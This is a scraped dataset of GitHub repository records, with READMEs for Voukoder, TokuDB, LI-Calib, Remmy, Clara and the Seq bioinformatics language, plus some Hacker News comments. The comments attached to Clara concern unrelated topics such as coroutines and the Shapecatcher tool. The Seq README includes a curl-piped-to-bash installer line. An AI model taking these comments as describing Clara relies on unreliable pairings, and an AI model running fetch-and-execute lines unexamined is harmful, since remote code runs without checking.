"https://github.com/Vouk/voukoder", "tags": ["x264", "libav", "x265", "hevc", "prores", "ffmpeg", "prm", "nvenc", "h264", "h265"], "stars": 647, "description": "Provides an easy way to include the FFmpeg encoders in other windows applications.", "lang": "C++", "repo_lang": "", "readme": "**INFOS & DOWNLOAD HERE: WWW.VOUKODER.ORG**
\n\n**Available application connectors:**\n\nFind these connectors at the [application connectors page](https://github.com/Vouk/voukoder-connectors):\n- Adobe Premiere / Media Encoder\n- Adobe After Effects\n- DaVinci Resolve\n- VEGAS Pro\n- VirtualDub 2\n\n**Stay up-to-date, discuss on the forums and get all announcements and news at https://www.voukoder.org.**\n- Patreon: https://www.patreon.com/voukoder\n- Ko-fi: https://ko-fi.com/voukoder\n- Paypal: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=S6LGDW9QZYBTL&source=url\n- Twitter: https://twitter.com/LordVouk\n\n## Contributors\n\n### Code Contributors\n\nThis project exists thanks to all the people who contribute. [[Contribute](CONTRIBUTING.md)].\n\n\n### Financial Contributors\n\nBecome a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/voukoder/contribute)]\n\n#### Individuals\n\n\n\n#### Organizations\n\nSupport this project with your organization. Your logo will show up here with a link to your website. [[Contribute](https://opencollective.com/voukoder/contribute)]\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "percona/tokudb-engine", "link": "https://github.com/percona/tokudb-engine", "tags": ["ps"], "stars": 647, "description": "Percona TokuDB is a high-performance, write optimized, compressing, transactional storage engine for Percona Server. Issue tracker: https://tokutek.atlassian.net/browse/DB/ Wiki: https://github.com/Percona/tokudb-engine/wiki Downloads:", "lang": "C++", "repo_lang": "", "readme": "TokuDB\n======\n\nTokuDB is a high-performance, write optimized, transactional storage engine for Percona Server and MySQL.\nFor more details, see our [product page][products].\n\nThis repository contains the MySQL plugin that uses the [PerconaFT][perconaft] core.\n\n[products]: https://www.percona.com/software/percona-tokudb\n[perconaft]: http://github.com/Percona/PerconaFT\n\nDownload\n--------\n\n* [Percona Server 5.6 + TokuDB](http://www.percona.com/downloads/)\n\nBuild\n-----\n\nBefore you start, make sure you have a C++11-compatible compiler (GCC >=\n4.7 is recommended), as well as CMake >=2.8.8, and the libraries and\nheader files for valgrind, zlib, and Berkeley DB. We use gcc 4.7\nfrom devtoolset-1.1.\n\nOn CentOS, `yum install valgrind-devel zlib-devel libdb-devel`\n\nOn Ubuntu, `apt-get install valgrind zlib1g-dev libdb-dev`\n\nYou can set the compiler by passing `--cc` and `--cxx` to the script, to\nselect one that's new enough. The default is `scripts/make.mysql.bash\n--cc=gcc47 --cxx=g++47`, which may not exist on your system.\n\nWe use gcc from devtoolset-1.1 on CentOS 5.9 for builds.\n\nTo build a complete set of Percona Server and TokuDB, follow the instructions at\n[build a debug environment][howtobuild].\n\n[howtobuild]: https://github.com/percona/tokudb-percona-server-5.6/wiki/Build-a-debug-environment\n\nContribute\n----------\n\nPlease report TokuDB bugs to the [issue tracker][jira].\n\nWe have two publicly accessible mailing lists:\n\n - tokudb-user@googlegroups.com is for general and support-related\n questions about the use of TokuDB.\n - tokudb-dev@googlegroups.com is for discussion of the development of\n TokuDB.\n\nAll source code and test contributions must be provided under a [BSD 2-Clause][bsd-2] license. For any small change set, the license text may be contained within the commit comment and the pull request. 
For larger contributions, the license must be presented in a COPYING. file in the root of the tokudb-engine project. Please see the [BSD 2-Clause license template][bsd-2] for the content of the license text.\n\n[jira]: https://tokutek.atlassian.net/browse/DB/\n[bsd-2]: http://opensource.org/licenses/BSD-2-Clause/\n\nLicense\n-------\n\nTokuDB is available under the GPL version 2 and AGPL version 3. See [COPYING][copying]\n\nPerconaFT is a part of TokuDB and is available under the GPL version 2,\nand AGPL version 3, with slight modifications. See [COPYING.AGPLv3][agpllicense],\n[COPYING.GPLv2][gpllicense], and\n[PATENTS][patents].\n\n[agpllicense]: http://github.com/Percona/PerconaFT/blob/master/COPYING.AGPLv3\n[gpllicense]: http://github.com/Percona/PerconaFT/blob/master/COPYING.GPLv2\n[patents]: http://github.com/Percona/PerconaFT/blob/master/PATENTS\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "APRIL-ZJU/lidar_IMU_calib", "link": "https://github.com/APRIL-ZJU/lidar_IMU_calib", "tags": [], "stars": 647, "description": "Targetless Calibration of LiDAR-IMU System Based on Continuous-time Batch Estimation", "lang": "C++", "repo_lang": "", "readme": "# LI-Calib\n\n## Overview\n\n**LI-Calib** is a toolkit for calibrating the 6DoF rigid transformation and the time offset between a 3D LiDAR and an IMU. It's based on continuous-time batch optimization. IMU-based cost and LiDAR point-to-surfel distance are minimized jointly, which renders the calibration problem well-constrained in general scenarios. \n\n## **Prerequisites**\n\n- [ROS](http://wiki.ros.org/ROS/Installation) (tested with Kinetic and Melodic)\n\n  ```shell\n  sudo apt-get install ros-melodic-pcl-ros ros-melodic-velodyne-msgs\n  ```\n\n- [Ceres](http://ceres-solver.org/installation.html) (tested with version 1.14.0)\n\n- [Kontiki](https://github.com/APRIL-ZJU/Kontiki) (Continuous-Time Toolkit)\n- Pangolin (for visualization and user interface)\n- [ndt_omp](https://github.com/APRIL-ZJU/ndt_omp) \n\nNote that **Kontiki** and **Pangolin** are included in the *thirdparty* folder.\n\n## Install\n\nClone the source code for the project and build it.\n\n```shell\n# init ROS workspace\nmkdir -p ~/catkin_li_calib/src\ncd ~/catkin_li_calib/src\ncatkin_init_workspace\n\n# Clone the source code for the project and build it. \ngit clone https://github.com/APRIL-ZJU/lidar_IMU_calib\n\n# ndt_omp\nwstool init\nwstool merge lidar_IMU_calib/depend_pack.rosinstall\nwstool update\n# Pangolin\ncd lidar_imu_calib_beta\n./build_submodules.sh\n## build\ncd ../..\ncatkin_make\nsource ./devel/setup.bash\n```\n\n## Examples\n\nCurrently the LI-Calib toolkit only supports `VLP-16`, but it is easy to extend it to other LiDARs. \n\nRun the calibration:\n\n```shell\n./src/lidar_IMU_calib/calib.sh\n```\n\nThe options in `calib.sh` have the following meanings:\n\n- `bag_path` path to the dataset.\n- `imu_topic` IMU topic.\n- `bag_start` the relative start time of the rosbag [s].\n- `bag_durr` the duration for data association [s].\n- `scan4map` the duration for NDT mapping [s].\n- `timeOffsetPadding` maximum range in which the time offset may change during estimation [s].\n- `ndtResolution` resolution for NDT [m].\n\n\"UI\"\n\nFollow these steps: \n\n1. `Initialization`\n\n2. `DataAssociation`\n\n   (Users are encouraged to toggle `show_lidar_frame` to check the odometry result.)\n\n3. `BatchOptimization`\n\n4. `Refinement`\n\n5. `Refinement`\n\n6. ...\n\n7. 
(you could try to optimize the time offset by choosing `optimize_time_offset`, then running `Refinement`)\n\n8. `SaveMap`\n\nAll the cached results are saved in the location of the dataset.\n\n**Note that the toolkit is implemented with only one thread, so it may respond slowly while processing data. Please be patient.** \n\n## Dataset\n\n\"3imu\"\n\nDatasets for evaluating LI-Calib are available [here](https://drive.google.com/drive/folders/1kYLVLMlwchBsjAoNqnrwq2N2Ow5na4VD?usp=sharing). \n\nWe utilize an MCU (stm32f1) to simulate the synchronization Pulse Per Second (PPS) signal. The LiDAR's timestamps are synchronized to UTC, and each IMU captures the rising edge of the PPS signal and outputs its latest data with a sync signal. Considering the jitter of the MCU's internal clock, the external synchronization method has some error (within a few microseconds).\n\nEach rosbag contains 7 topics:\n\n```\n/imu1/data : sensor_msgs/Imu \n/imu1/data_sync : sensor_msgs/Imu \n/imu2/data : sensor_msgs/Imu \n/imu2/data_sync : sensor_msgs/Imu \n/imu3/data : sensor_msgs/Imu \n/imu3/data_sync : sensor_msgs/Imu \n/velodyne_packets : velodyne_msgs/VelodyneScan\n```\n\n`/imu*/data` are raw data whose timestamps coincide with the receive time. \n\n`/imu*/data_sync` are the synchronized data, as are `/velodyne_packets`.\n\n## Credits \n\nThis code was developed by the [APRIL Lab](https://github.com/APRIL-ZJU) at Zhejiang University.\n\nFor researchers who have leveraged or compared to this work, please cite the following:\n\nJiajun Lv, Jinhong Xu, Kewei Hu, Yong Liu, Xingxing Zuo. Targetless Calibration of LiDAR-IMU System Based on Continuous-time Batch Estimation. IROS 2020. [[arxiv](https://arxiv.org/pdf/2007.14759.pdf)]\n\n## License\n\nThe code is provided under the [GNU General Public License v3 (GPL-3)](https://www.gnu.org/licenses/gpl-3.0.txt).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hjk41/Remmy", "link": "https://github.com/hjk41/Remmy", "tags": [], "stars": 647, "description": "A simple but usable RPC framework", "lang": "C++", "repo_lang": "", "readme": "Remmy\n=======\n\nRemmy is a simple but usable RPC library. Thanks to the structural simplicity of the code, it is suitable for use in education as well.\n\nThe communication layer can be implemented with any network library. Currently, we support ASIO and ZeroMQ as the network layer.\n\nThe current implementation uses C++14, so you need a reasonably modern compiler to compile the code.\n\nTested on both Linux and Windows (Visual Studio 2019).\n\n\nCompiling Test\n=======\n\ntest/test.cpp is a simple test demonstrating how to use Remmy. You can compile it with `CMake`, `make`, or `Visual Studio`.\n\n**Compiling With CMake**\n\nTo compile with `CMake`, use the following command:\n```bash\nuser@myhost:~/projects/Remmy$ mkdir build\nuser@myhost:~/projects/Remmy$ cd build\nuser@myhost:~/projects/Remmy/build$ cmake .. -DCOMM_LAYER=ASIO\n-- The C compiler identification is GNU 7.4.0\n-- The CXX compiler identification is GNU 7.4.0\n-- ...\n-- Configuring done\n-- Generating done\n-- Build files have been written to: /home/user/projects/Remmy/build\nuser@myhost:~/projects/Remmy/build$ make\nScanning dependencies of target remmy_test\n[ 50%] Building CXX object CMakeFiles/remmy_test.dir/test/test.cpp.o\n[100%] Linking CXX executable remmy_test\n[100%] Built target remmy_test\n```\n\nNote that we use the `-DCOMM_LAYER=ASIO` option for `CMake` here. Remmy supports ASIO and ZMQ. 
Here we choose ASIO as the communication layer.\n\nIf you want to use ZeroMQ, you also need to install libzmq.\n\n**Compiling With `make`**\n\nThere is a Makefile under `Remmy/test`, which can be used to compile the test. The communication layer can be switched by defining `USE_ASIO` or `USE_ZMQ` at the top of the Makefile.\n\n**Building With VS 2017/2019**\n\n`Remmy/remmy.sln` is a VS 2019 solution file. You can use VS 2019 to open the solution and compile the test project. However, if you choose to use VS 2017, you need to retarget the solution before you can build it. To retarget the solution, open it and right-click on `Solution 'Remmy'` in `Solution Explorer`, then choose `Retarget Solution`. In the pop-up window, choose `latest installed version` for `Windows SDK Version`.\n\nBy default the solution uses ASIO as the communication layer. Switching to ZeroMQ requires defining the `USE_ZMQ` and `USE_ASIO` macros in the project properties. You will also need to specify the location of the ZeroMQ library when using ZeroMQ.\n\n\nProgramming interface\n=======\n\n```c++\n// define protocol\nclass RPC_Protocol : public ProtocolWithUID {\npublic:\n    ComplexType req;\n    size_t resp;\n\n    virtual void MarshallRequest(StreamBuffer & buf) {\n        req.Serialize(buf);\n    }\n\n    virtual void MarshallResponse(StreamBuffer & buf) {\n        Serialize(buf, resp);\n    }\n\n    virtual void UnmarshallRequest(StreamBuffer & buf) {\n        req.Deserialize(buf);\n    }\n\n    virtual void UnmarshallResponse(StreamBuffer & buf) {\n        Deserialize(buf, resp);\n    }\n\n    virtual void HandleRequest(void *server) {\n        // as a demonstration, this protocol returns req.x + req.y + req.z.size(),\n        // and adds this value to server, which is just a std::atomic<size_t>\n        std::atomic<size_t>* s = static_cast<std::atomic<size_t>*>(server);\n        resp = req.x + (size_t)req.y + req.z.size();\n        // note that the handler can be executed by multiple threads at the same time,\n        // so we need to make it thread-safe\n        s->fetch_add(resp);\n        REMMY_WARN(\"Server is now %lu\", s->load());\n    }\n};\n\n    // start server\n    // ...\n    std::atomic<size_t> size = 0;\n    rpc.RegisterProtocol(&size);\n    rpc.StartServing();\n\n    // now, create a client\n    AsioEP ep(asio::ip::address::from_string(\"127.0.0.1\"), port);\n    RPC_Protocol proto;\n    proto.req.x = 10;\n    proto.req.y = 1.0;\n    proto.req.z = \"12345\";\n    ec = rpc.RpcCall(ep, proto);\n    std::cout << \"response = \" << proto.resp << std::endl;\n```\n\nPlease refer to [/test/test.cpp](/test/test.cpp) for an example of how to use Remmy.\n\n\nContributing\n=======\nEveryone is welcome to contribute to this project, either to improve the code or the documentation.\n\nThe whole library can be divided into these parts:\n\n* rpc_stub.h: contains the RPCStub class, which is the entry point\n\n* protocol.h: declares the interface of protocols\n\n* serialize.h: implements the Serializer template class\n\n* comm.h: declares the communication layer, which can be implemented with any network library, such as asio (as in comm_asio.h), ZeroMQ, etc.\n\n* other stuff: including logging, message structure, buffer, concurrent queue, unique id, ...\n\nI will try to write as much documentation as possible in the files, but you are also welcome to contribute standalone documentation files.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "catchorg/Clara", "link": "https://github.com/catchorg/Clara", "tags": [], "stars": 647, "description": "A simple to use, composable, command line parser for C++ 11 and beyond", "lang": "C++", "repo_lang": "", "readme": "# 
Clara v1.1.5\n[![Build Status](https://travis-ci.org/catchorg/Clara.svg?branch=master)](https://travis-ci.org/catchorg/Clara)\n[![Build status](https://ci.appveyor.com/api/projects/status/github/catchorg/Clara?brach=master&svg=true)](https://ci.appveyor.com/project/catchorg/clara)\n[![codecov](https://codecov.io/gh/catchorg/Clara/branch/master/graph/badge.svg)](https://codecov.io/gh/catchorg/Clara)\n\n# !! This repository is unmaintained. Go [here](https://github.com/bfgroup/Lyra) for a fork that is somewhat maintained. !!\n\n-----------------------------\n\n\nA simple to use, composable, command line parser for C++ 11 and beyond.\n\nClara is a single-header library.\n\nTo use, just `#include \"clara.hpp\"`\n\nA parser for a single option can be created like this:\n\n```c++\nint width = 0;\n// ...\nusing namespace clara;\nauto cli\n    = Opt( width, \"width\" )\n        [\"-w\"][\"--width\"]\n        (\"How wide should it be?\");\n```\n\nYou can use this parser directly like this:\n\n```c++\nauto result = cli.parse( Args( argc, argv ) );\nif( !result ) {\n    std::cerr << \"Error in command line: \" << result.errorMessage() << std::endl;\n    exit(1);\n}\n\n// Everything was ok, width will have a value if supplied on command line\n```\n\nNote that exceptions are not used for error handling.\n\nYou can combine parsers by composing with `|`, like this:\n\n```c++\nint width = 0;\nstd::string name;\nbool doIt = false;\nstd::string command;\nauto cli\n    = Opt( width, \"width\" )\n        [\"-w\"][\"--width\"]\n        (\"How wide should it be?\")\n    | Opt( name, \"name\" )\n        [\"-n\"][\"--name\"]\n        (\"By what name should I be known\")\n    | Opt( doIt )\n        [\"-d\"][\"--doit\"]\n        (\"Do the thing\" )\n    | Arg( command, \"command\" )\n        (\"which command to run\");\n```\n\n`Opt`s specify options that start with a short dash (`-`) or long dash (`--`).\nOn Windows forward slashes are also accepted (and automatically interpreted as a short dash).\nOptions can be argument-taking (such as `-w 42`), in which case the `Opt` takes a second argument - a hint,\nor they are pure flags (such as `-d`), in which case the `Opt` has only one argument - which must be a boolean.\nThe option names are provided in one or more sets of square brackets, and a description string can\nbe provided in parentheses. The first argument to an `Opt` is any variable (local, global or member) of any type\nthat can be converted from a string using `std::ostream`.\n\n`Arg`s specify arguments that are not tied to options, and so have no square bracket names. They otherwise work just like `Opt`s.\n\nA console-optimised usage string can be obtained by inserting the parser into a stream.\nThe usage string is built from the information supplied and is formatted for the console width.\n\nAs a convenience, the standard help options (`-h`, `--help` and `-?`) can be specified using the `Help` parser,\nwhich just takes a boolean to bind to.\n\nFor more usage examples, please see the unit tests or look at how it is used in the Catch code-base (catch-lib.net).\nFuller documentation will be coming soon.\n\nSome of the key features:\n\n- A single header file with no external dependencies (except the std library).\n- Define your interface once to get parsing, type conversions and usage strings with no redundancy.\n- Composable. Each `Opt` or `Arg` is an independent parser. 
Combine these to produce a composite parser - this can be done in stages across multiple function calls - or even projects.\n- Bind parsers directly to variables that will receive the results of the parse - no intermediate dictionaries to worry about.\n- Or can also bind parsers to lambdas for more custom handling.\n- Deduces types from bound variables or lambdas and performs type conversions (via `ostream <<`), with error handling, behind the scenes.\n- Bind parsers to vectors for args that can have multiple values.\n- Uses Result types for error propagation, rather than exceptions (doesn't yet build with exceptions disabled, but that will be coming later)\n- Models POSIX standards for short and long opt behaviour.\n\n## Roadmap\n\nTo see which direction Clara is going in, please see [the roadmap](Roadmap.md)\n\n## Old version\n\nIf you used the earlier, v0.x, version of Clara please note that this is a complete rewrite which assumes C++11 and has\na different interface (composability was a big step forward). Conversion between v0.x and v1.x is a fairly simple and mechanical task, but is a bit of manual\nwork - so don't take this version until you're ready (and, of course, able to use C++11).\n\nI hope you'll find the new interface an improvement - and this will be built on to offer new features moving forwards.\nI don't expect to maintain v0.x any further, but it remains on a branch.\n", "readme_type": "markdown", "hn_comments": "Coroutines fit into some functional languages fairly naturally. They can be constructed out of the primitive operator call/cc (call with current continuation) in Scheme and simple cooperative threading, exceptions, callbacks, coroutines, etc. are usually implemented that way in Scheme, and pretty widely used. It meshes okay I guess with the rest of the language and libraries, but Scheme doesn't really have much in the way of libraries.Coroutines are a type of monad in Haskell. If you want function calls to alternate between execution streams, that sort of chaining of execution, is what Haskell's monads deal with. Instance the type you're using in the Coroutine class, and any functions with the same Coroutine type, will automatically work as coroutines between each other when you suspend them. It's part of the standard library in Control.Monad.Coroutine. Since it's a monad, it composes with other monads, and will work with most library code. As to IO, with a lazy evaluation language, when a blocking call is made, other parts that can still evaluate (not just pending coroutines but also regular functions not depending on the blocking call) can continue, so all IO in Haskell sort of works as you describe there, I think. Lazy evaluation is usually implemented with coroutines, IIRC. In a sense, every value in the program is in its own coroutine, that runs when the value needs to be calculated because some other value depends on it. Analyzing the efficiency of lazy programs suffers the same kind of problem you mention with concurrent programs, to be fair.Elixir has concurrency built in as an easy to use concept. There is the concept of processes running within the runtime, which is called the BEAM. Think of the runtime as a mini OS where you can create lightweight processes as needed to do things asynchronously. 
You can use a simple Task module[0] to do things async or implement GenServer[1] which is a process running and has state.An example is calling an API that has a paginated response where it indicates the number of pages (like ?page=X in GET request), you can async call each page and accumulate the responses using a map_reduce function[2]. You could fire up like 1000 (or 10k or as many as you like really) of these processes calling an API with different params/creds and handling paginated responses concurrently, each with their own state. I found that Elixir will let you quickly exhaust any rate limit budget/threshold you have in a scenario like this, that is more the limiting factor.[0] https://hexdocs.pm/elixir/1.13.4/Task.html[1] https://hexdocs.pm/elixir/1.13.4/GenServer.html[2] https://hexdocs.pm/elixir/1.13.4/Enum.html#map_reduce/3Love this tool! (Btw title should be one word: \"Shapecatcher\")Similar tool for mathematical symbols: http://detexify.kirelabs.org/classify.htmlThe search isn't really perfect. I tried drawing a (pretty good, IMO) Hiragana \"no\" and that result was in the third place (First was, a latin small m. \u306e looks nothing like an m). Then tried Greek small sigma (\u03c3) but not perfectly (I draw ny sigmas in a weird way, looks like this: http://imgur.com/a/XYVHO), the top result I got (Malayalam fraction one quarter: \u0d73) kind of looks like the thing I drew, but the rest of the results are not really resembling it and there's no sigma there.Pretty cool! I wonder why the recognizer is not very good at differentiating among types of faces (sad face, happy face, etc.)I use this occasionally when trying to find a new glyph. There are some drawbacks though:\u2022 Last updated in 2012: http://shapecatcher.com/news.html\u2022 No way to draw straight lines except pixel-by-pixel (really tedious). This turned out to be a pain when trying to draw various arrow types (made of straight lines).I'm hoping the author, Benjamin Milde, picks the project up again and keeps it updated, or makes it Open Source, then someone else does.I could not get it to identify a British Pound symbol after several attempts. The top proposed glyph was much more obscure and the following ones were increasingly obscure from there.I suspect that the training corpus may have been a table of Unicode glyphs rather than text from the wild.This is kind of a missing piece, in a lot of ways. With such a large character set as Unicode's, discovery can be a real pain - when you see a novel character, how do you find out what it's called, so you can find out how to type it?Unless you're using something like Emacs which lets you point at a character and ask the editor to tell you everything it knows about what's there, this kind of identification becomes a daunting task to contemplate. Shapecatcher does an excellent job of it; as long as you can draw something roughly approximating the glyph you have in mind, it'll very effectively winnow down the search space to a very manageable list of possible matches.This is really great. Works perfectly and solves a very practical problem for me. Unicode really should do something about discoverability though.It reminds me the special character finder in Google Docs, very well done.Android Wear does something like this for emojis - I've gotten pretty good at drawing a \"thumbs up\" to respond to text messages and such.Interesting idea. It seems to struggle a bit with some types of characters. 
For example, drawing a lowercase pi would return many characters with more than two legs, which showed up ahead of pi itself and other characters that do have the two. Does clicking on the good/bad feedback links in cases like this help to train the algorithm in some way?This is cool, though I was a bit disappointed to notice the part about no support for CJK characters after trying to draw one and not having it recognized. It seems to me that looking up Unihan ideographs is an area where a tool like this could be particularly useful.Pretty neat. Would be useful to be able to restrict the blocks that are searched. For example I might know that the character I'm looking for is Japanese, so if I could let it know that I was looking for is Japanese then it could restrict itself to Katakana, Katakana Phonetic Extensions and other blocks if any that apply to Japanese specifically.Really well done, and handled my crappy drawings just fine.I did see the link to your thesis on captcha, but a specific higher level blog post on how this works would likely be popular.Edit: One piece of feedback...it's hard to draw dots. You have to drag the cursor with the button down, or drag your finger in mobile to get a dot. So dots end up more like little lines. Also, an \"Undo\" to remove the last \"cursor down / draw\" event would be nice. Starting over for every line is the only current option.?\u00ec\u03f2\u0435 homoglyph search tool you've made :)(it found all the letters of the word \"nice\" quite well!)That's really fun!Because they did it!\nAmericans have special powers. \nSee for example Scott Adams:\nhttp://blog.dilbert.com/post/134861704021/my-offer-to-stop-d...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "seq-lang/seq", "link": "https://github.com/seq-lang/seq", "tags": ["bioinformatics", "computational-biology", "genomics", "programming-language", "domain-specific-language", "compiler", "python"], "stars": 647, "description": "A high-performance, Pythonic language for bioinformatics", "lang": "C++", "repo_lang": "", "readme": "## Work on the Seq compiler is being continued in [Codon](https://github.com/exaloop/codon), a general, extensible, high-performance Python compiler. Seq's bioinformatics libraries, features and optimizations are still available and being maintained as [a plugin](https://github.com/exaloop/seq) for Codon.\n\n---\n\n
\n[Seq logo]\n\nSeq \u2014 a language for bioinformatics\n\n[Badges: Build Status | Gitter | Version | License]\n
\n\n## Introduction\n\n> **A strongly-typed and statically-compiled high-performance Pythonic language!**\n\nSeq is a programming language for computational genomics and bioinformatics. With a Python-compatible syntax and a host of domain-specific features and optimizations, Seq makes writing high-performance genomics software as easy as writing Python code, and achieves performance comparable to (and in many cases better than) C/C++.\n\n**Think of Seq as a strongly-typed and statically-compiled Python: all the bells and whistles of Python, boosted with a strong type system, without any performance overhead.**\n\nSeq is able to outperform Python code by up to 160x. Seq can further beat equivalent C/C++ code by up to 2x without any manual interventions, and also natively supports parallelism out of the box. Implementation details and benchmarks are discussed [in our paper](https://dl.acm.org/citation.cfm?id=3360551).\n\nLearn more by following the [tutorial](https://docs.seq-lang.org/tutorial) or from the [cookbook](https://docs.seq-lang.org/cookbook).\n\n## Examples\n\nSeq is a Python-compatible language, and many Python programs should work with few if any modifications:\n\n```python\ndef fib(n):\n a, b = 0, 1\n while a < n:\n print(a, end=' ')\n a, b = b, a+b\n print()\nfib(1000)\n```\n\nThis prime counting example showcases Seq's [OpenMP](https://www.openmp.org/) support, enabled with the addition of one line. The `@par` annotation tells the compiler to parallelize the following for-loop, in this case using a dynamic schedule, chunk size of 100, and 16 threads.\n\n```python\nfrom sys import argv\n\ndef is_prime(n):\n factors = 0\n for i in range(2, n):\n if n % i == 0:\n factors += 1\n return factors == 0\n\nlimit = int(argv[1])\ntotal = 0\n\n@par(schedule='dynamic', chunk_size=100, num_threads=16)\nfor i in range(2, limit):\n if is_prime(i):\n total += 1\n\nprint(total)\n```\n\nHere is an example showcasing some of Seq's bioinformatics features, which include native sequence and k-mer types.\n\n```python\nfrom bio import *\ns = s'ACGTACGT' # sequence literal\nprint(s[2:5]) # subsequence\nprint(~s) # reverse complement\nkmer = Kmer[8](s) # convert to k-mer\n\n# iterate over length-3 subsequences\n# with step 2\nfor sub in s.split(3, step=2):\n print(sub[-1]) # last base\n\n # iterate over 2-mers with step 1\n for kmer in sub.kmers(step=1, k=2):\n print(~kmer) # '~' also works on k-mers\n```\n\n## Install\n\n### Pre-built binaries\n\nPre-built binaries for Linux and macOS on x86_64 are available alongside [each release](https://github.com/seq-lang/seq/releases). We also have a script for downloading and installing pre-built versions:\n\n```bash\n/bin/bash -c \"$(curl -fsSL https://seq-lang.org/install.sh)\"\n```\n\n### Build from source\n\nSee [Building from Source](docs/sphinx/build.rst).\n\n## Documentation\n\nPlease check [docs.seq-lang.org](https://docs.seq-lang.org) for in-depth documentation.\n\n## Citing Seq\n\nIf you use Seq in your research, please cite:\n\n> Ariya Shajii, Ibrahim Numanagi\u0107, Riyadh Baghdadi, Bonnie Berger, and Saman Amarasinghe. 2019. Seq: a high-performance language for bioinformatics. *Proc. ACM Program. Lang.* 3, OOPSLA, Article 125 (October 2019), 29 pages. DOI: https://doi.org/10.1145/3360551\n\nBibTeX:\n\n```\n@article{Shajii:2019:SHL:3366395.3360551,\n author = {Shajii, Ariya and Numanagi\\'{c}, Ibrahim and Baghdadi, Riyadh and Berger, Bonnie and Amarasinghe, Saman},\n title = {Seq: A High-performance Language for Bioinformatics},\n journal = {Proc. 
ACM Program. Lang.},\n  issue_date = {October 2019},\n  volume = {3},\n  number = {OOPSLA},\n  month = oct,\n  year = {2019},\n  issn = {2475-1421},\n  pages = {125:1--125:29},\n  articleno = {125},\n  numpages = {29},\n  url = {http://doi.acm.org/10.1145/3360551},\n  doi = {10.1145/3360551},\n  acmid = {3360551},\n  publisher = {ACM},\n  address = {New York, NY, USA},\n  keywords = {Python, bioinformatics, computational biology, domain-specific language, optimization, programming language},\n}\n```\n", "readme_type": "markdown", "hn_comments": "The code examples look like Python 2 rather than Python 3: print doesn't have parentheses. Why was this decision made?

Looks great, will definitely give this a try since it does sequence manipulations that I otherwise have to write myself.

Will this be available via conda? And how would Seq integrate with Snakemake, since that is also based on Python?

I'm wondering if Seq can also serve as a general-purpose replacement for Python whenever a fast executable is needed.

Quick explainer video: https://youtu.be/5bk4Wc5Op2M

I am a CS person who works with bioinformaticians every day as part of my job. I really like that Seq seems to have some parallelization ability built in. I spend no small amount of time in my day job doing that manually in R with RcppParallel, for loops that are totally independent across each iteration. Bioinformaticians are often educated to use a specific programming language and environment. They aren't usually looking to try other languages. For example, I support our bioinformatics group and they are basically 100% R and RStudio users. We have a single user of Python, and that user is doing \"typical\" tensorflow stuff with images. I've noticed this same bias towards a single language in some other academic niches. Like SAS or Stata camps in public health or psychology - I think of these languages as basically the same, but for non-CS folks the perception seems to be more like English vs Russian. Even more complicated, researchers may be extremely committed to a specific library in a language and suspicious of languages that don't have their favorite library available. Any shift to new tooling for these highly-committed users will almost certainly require large and obvious benefits to gain traction.

Also see this comparison between Julia's BioSequences and Seq by Jakob Nissen and Ben Ward: https://biojulia.net/post/seq-lang/
See also:
https://dl.acm.org/doi/pdf/10.1145/3360551
https://www.nature.com/articles/s41587-021-00985-6 (paywalled)

It's an impressive project, but I'm not sure the niche is big enough. It's certainly come a long way since the last time I looked at it! My biggest concern is that Seq sucks users into a sort of local maximum. While the piping syntax is nice, and the built-in routines are handy, it's a lot less flexible than a \"mainstream\" programming language, simply because of the smaller community and relative paucity of libraries. BioPython [1] has been around a long, long time, and I think a lot of potential users of Seq would be better suited by using a regular bioinformatics library in the language they know best. E.g., the example of reading FASTA files in Seq:\n\n    # iterate over everything\n    for r in FASTA('genome.fa'):\n        print r.name\n        print r.seq\n\nversus BioPython:\n\n    from Bio import SeqIO\n    for r in SeqIO.parse(\"genome.fa\", \"fasta\"):\n        print(r.id)\n        print(r.seq)\n\nIt might be pretty useful as a teaching tool, but I'm skeptical of its long-term benefit to professionals.
I'm not sure the ecosystem of Seq users will be large enough, y'know? Again, it's pretty impressive work, and it's come a long way. I wish the devs all the best. :)
1. https://biopython.org/

I like this idea. However, to me it is similar to using \u00e0 la carte tools/programs along with bash scripts or a DSL such as Nextflow. More often, these stand-alone programs are already written in compiled languages. I am sure Seq will allow building customized programs, as compared to scripting or gluing programs together.

It's odd that they didn't include Nim in the benchmarks in their paper: https://dl.acm.org/doi/pdf/10.1145/3360551

> Seq is a Python-compatible language, and the vast majority of Python programs should work without any modifications
> Seq is able to outperform Python code by up to 160x.
So ... a reimplementation of Python that can outperform cpython by over 100 times? I know literally nothing about this project, but I have to say that rings pretty false for me. Hell, even PyPy has trouble with many applications. (Plus they're claiming to outperform \"equivalent\" C code by 2x.)

Even if the performance claims are overblown, it's always nice to see new work on compiled languages with easy-to-read syntax. It's hard to beat Python for an education / prototyping language, so I will definitely be giving this a look.

Typically, any high-performance (low latency or high throughput) genomics/bioinformatics application is not going to be written in plain Python, except possibly for prototyping. Instead, nearly all codes today are written in C++ or Java, with some sort of command and control in Python or a DAG-based workflow scheduler. I don't expect the community will adopt other languages at a large scale. My hope, though, is that more of these algorithms move to real distributed processing systems like Spark, to take advantage of all the great ideas in systems like that. But genomics will continue to trail the leading edge by about 20 years for the foreseeable future.

I'm in the target market but can't use this unless it supports all of my Python libraries, like Django and Numpy.

It seems to me there is a huge demand for making Python faster, whether it be via a more optimisation-friendly subset, or ideally throwing engineering talent into improving the interpreter. V8 shows this can be done with highly dynamic Javascript. I guess we need a big corporate sponsor or the community to fund some positions. It's kind of crazy how few developers are working on optimising cPython; it may even be worth it for environmental reasons.

Used it for coding Coursera/Stepik's Bioinformatics course [1] when it was first announced 2 years ago. Not claiming it as any sort of reference, but you can see how it [2] may be used to solve some basic genome sequencing.
[1] https://www.coursera.org/specializations/bioinformatics
[2] https://github.com/fuzzthink/seq-genomics

> Think of Seq as a strongly-typed and statically-compiled Python: all the bells and whistles of Python, boosted with a strong type system, without any performance overhead.
A pitch most people doing applied bioinformatics won\u2019t understand/appreciate.

How do you pronounce Seq?

